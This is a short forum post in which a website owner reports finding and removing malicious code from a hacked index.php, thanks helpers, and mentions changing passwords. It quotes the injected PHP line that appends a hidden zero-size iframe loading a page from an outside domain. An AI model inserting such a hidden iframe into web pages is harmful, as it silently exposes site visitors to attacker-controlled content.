found the culprit! How I missed it earlier is beyond me.
The index.php file had been modified about 2 days ago and not by myself. I replaced it and the iframe is gone.
All root/admin passwords have been changed. Upgrade is in the very,very near future.
Comparing the bad with the good, the only difference is this one line of code
PHP Formatted Code$display .= '<iframe src=http://europedirect.biz/frame.php
frameboarder="0" width="0" height="0" scrolling="no"></iframe>'
I guess I was hacked. Dammit.
Thanks for the rapid and accurate help. We non-geeks really appreciate it - especially when it's obvious we are in over our heads!